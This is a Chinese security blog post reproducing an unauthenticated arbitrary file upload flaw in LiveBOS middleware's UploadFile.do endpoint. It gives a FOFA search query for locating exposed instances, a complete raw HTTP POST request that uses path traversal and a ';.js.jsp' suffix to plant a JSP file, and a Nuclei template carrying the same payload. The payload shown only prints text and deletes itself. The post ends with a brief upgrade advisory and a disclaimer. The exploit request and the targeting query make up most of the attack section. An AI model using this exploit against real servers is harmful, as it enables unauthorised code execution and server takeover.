【漏洞复现】LiveBOS UploadFile.do 任意文件上传

于 2024-08-01 18:21:16 发布
阅读量220 收藏 5
点赞数 4
分类专栏: 漏洞复现 文章标签: 威胁情报 漏洞复现 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/140853891
版权

文章目录

0x00 漏洞描述

LiveBOS 是顶点软件股份有限公司开发的一个对象型业务架构中间件及其集成开发工具。
LiveBOS UploadFile.do 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

影响范围

福建顶点软件股份有限公司-LiveBos <= 3.9.0

0x01 测绘工具

fofa: body=“Power by LiveBOS”
在这里插入图片描述

在这里插入图片描述

0x02 漏洞复现

POST /feed/UploadFile.do;.js.jsp HTTP/1.1 
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
 
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data; name="file"; filename="/../../../../test.jsp"
Content-Type: image/jpeg
 
<%@ page import="java.io.File" %>
<%
 out.println("test");
 String filePath = application.getRealPath(request.getServletPath());
 new File(filePath).delete();
%>
---WebKitFormBoundaryxegqoxxi--

在这里插入图片描述在这里插入图片描述

0x03 Nuclei检测脚本

id: LiveBOS UploadFile.do 任意文件上传

info:
  name: LiveBOS UploadFile.do 任意文件上传
  author: admin
  severity: critical
  description: |
    This template detects a file upload vulnerability that allows for 
    the upload of arbitrary files, including JSP files that can be executed on the server.
  reference:
    - https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

requests:
  - raw:
      - |
        POST /feed/UploadFile.do;.js.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
        Connection: close

        ----WebKitFormBoundaryxegqoxxi
        Content-Disposition: form-data; name="file"; filename="/../../../../test.jsp"
        Content-Type: image/jpeg

        <%@ page import="java.io.File" %>
        <%
         out.println("");
         String filePath = application.getRealPath(request.getServletPath());
         new File(filePath).delete();
        %>
        ----WebKitFormBoundaryxegqoxxi--

    matchers:
      - type: word
        words:
          - "file uploaded successfully"
        part: body

0x04 修复建议

厂商已发布安全修复版本,请及时联系官方售后或客服升级至最新版本,https://www.livebos.com

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。
作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

An0nymouer
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【1day】LiveBOS ShowImage.do 接口存在任意文件读取漏洞
记录并分享学习安全的知识点..
08-21 847
LiveBOS(简称LiveBOS)是顶点软件股份有限公司开发的一个对象型业务架构中间件及其集成开发工具。它以业务模型建立为中心,直接完成软件开发的创新软件开发模式。适合于各类基于WEB的专业应用软件与行业大型应用的开发。LiveBOS ShowImage.do 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件。 ​
LiveBos ShowImage.do文件imgName参数任意文件读取漏洞
weixin_43567873的博客
03-10 236
LiveBos ShowImage.do文件imgName参数任意文件读取漏洞
LiveBOS UploadFile.do 任意文件漏洞(XVE-2023-21708)
最新发布
0xSec
08-01 230
LiveBOS UploadFile.do 接口存在任意文件漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞】用友 U8CRM uploadfile.php 任意文件漏洞
凝聚力安全团队
06-24 616
用友 U8CRM uploadfile.php 接口存在任意文件漏洞,攻击者可以通过漏洞任意文件甚至木马文件,从而获取服务器权限。用友CRM智能化销售与售后赋能工作台,以赋能团队和客户经营为目标,融入用友在客户关系与营销团队管理的丰富实践经验,专注为企业提供直分销融合一体化、移动化、自动化、社会化、智能化的销售、售后与客户管理解决方案,提升企业的区域客户经营能力与数字化管理决策能力。
漏洞】泛微E-Office uploadfile.php 任意文件漏洞
qq_34780861的博客
04-23 315
在/general/index/UploadFile.php中上文件过滤不严格导致允许无限制地上文件,攻击者可以通过该漏洞直接获取网站权限。
漏洞】联达OA UpLoadFile.aspx 存在任意文件漏洞
https://blog.echo234.cn/
03-27 410
联达动力oa是PHPOA推出的新一代OA系统,系统支持性好、安全、数据高速缓存化;支持100+应用自行安装与定义,应用表单自定义,支持应用无代码开发,支持多语言。该系统存在任意文件,攻击者可以上任意文件控制服务器。
Goby 漏洞发布|JeeSpringCloud uploadFile.jsp 文件漏洞
m0_46699477的博客
10-10 691
深信服下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。深信服下一代防火墙在 login.cgi 路径下,PHPSESSID 处存在命令执行漏洞。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
JeeSpringCloud uploadFile.jsp 文件漏洞
0xSec
11-28 989
JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台。JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上任意文件,并可通过 uploadPath 参数指定文件路径,导致服务器被控制。
漏洞】用友NC-任意文件-uploadFile
知黑而守白
05-05 205
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过uploadFile接口构造特定的请求包进行任意文件。该漏洞使得攻击者可以在受影响的系统上上恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
UploadFile.class.php支持多文件的上
03-31
UploadFile.class.php支持多文件的上类 说明:支持多文件的上类 使用方法: include '../UploadFile.class.php'; $upload=new UploadFile(); if(!$upload->upload()) { // 上错误提示错误信息 $...
uploadFile.zip
07-26
本压缩包"uploadFile.zip"包含了一个简单的Spring Boot项目,演示了如何实文件的功能。下面将详细解释这个模型中涉及的关键知识点。 1. **Spring Boot 2.0基础**: Spring Boot 2.0是基于Spring Framework 5...
UploadFile.zip
04-07
在JavaWeb开发中,文件是一项常见的功能,用于允许用户将本地文件如图片、文本、视频等上到服务器。"UploadFile.zip" 提供了一个实这一功能的资源包。在这个包中,我们可以找到相关的代码、配置和可能的示例...
jsp+javabean_uploadfile.rar_java uploadfile_jsp uploadfi_jsp 文件
09-23
在Java Web开发中,文件是一项常见的功能,用于允许用户将本地文件到服务器。本教程将详述如何使用JSP(JavaServer Pages)和JavaBean来实文件的功能。我们将围绕以下核心知识点展开: 1. **...
小程序wx.uploadFile中文无法上或者出乱码
03-29
各位同学小程序中碰到上图片或者文件时有用到formData的  formData Object 否 HTTP 请求中其他额外的 form data  出中文无法上或者出乱码时可以参考一下这篇跳坑指南微信小程序联盟-uploadFile跳坑指南  ...
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中.zip
07-31
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中
chromedriver-mac-x64_121.0.6167.184.zip
07-31
chromedriver-mac-x64_121.0.6167.184.zip
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。.zip
07-31
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。
资源管理的艺术:使用MySQL用户资源配额优化性能
07-31
MySQL是一个流行的开源关系型数据库管理系统(RDBMS),广泛用于Web应用程序的后端数据存储。它基于结构化查询语言(SQL)来管理数据,并且是LAMP(Linux, Apache, MySQL, PHP/Python/Perl)技术栈的一部分,这个技术栈常用于构建动态网站和Web应用程序。 MySQL的特点包括: - **开放源代码**:MySQL的源代码是公开的,任何人都可以自由使用和修改。 - **跨平台**:MySQL可以在多种操作系统上运行,包括Linux、Windows、macOS等。 - **高性能**:MySQL以其快速的查询处理和良好的性能而闻名。 - **可靠性**:MySQL提供了多种机制来确保数据的完整性和可靠性,包括事务支持、备份和恢功能。 - **易于使用**:MySQL提供了简单直观的界面和丰富的文档,便于用户学习和使用。 - **可扩展性**:MySQL支持从小型应用到大型企业级应用的扩展。 - **社区支持**:由于其广泛的使用,MySQL拥有一个活跃的开发者社区,提供大量的资源和支持。 MySQL被广泛应用于各种场景,包括在线事务处理(OL
uni.uploadFile文件
09-26
uni.uploadFile是一个uni-app框架提供的API,用于上文件。通过该API可以将文件到服务器,并在上成功后返回响应数据。在使用该API时,需要入一些参数,如上文件的路径、服务器接口地址等。具体的使用方法如下所示: 1. 引入uni.uploadFile方法,并在其中配置相关参数,例如: uni.uploadFile({ url: 'https://www.example.com/upload', // 服务器接口地址 filePath: tempFilePaths, // 待上文件路径 name: 'file', // 上文件对应的 key formData: { 'user': 'test' }, // 其他额外的表单数据 success: (uploadFileRes) => { // 上成功的回调函数 console.log(uploadFileRes.data); // 输出上成功后的响应数据 } }); 2. 后端配置php接口文件,例如新建tp_imgsrc.php文件,其中编写上图片的函数uploadimg。通过move_uploaded_file函数将文件从临时目录移动到目标目录。上成功后,返回一个包含上文件信息的json数据。 3. 在前端的upload方法中调用uni.chooseImage方法选择待上的图片文件,并在成功回调函数中调用uni.uploadFile方法上文件到服务器。上成功后,输出上成功后的响应数据。 以上是使用uni.uploadFile文件的一般步骤和示例代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值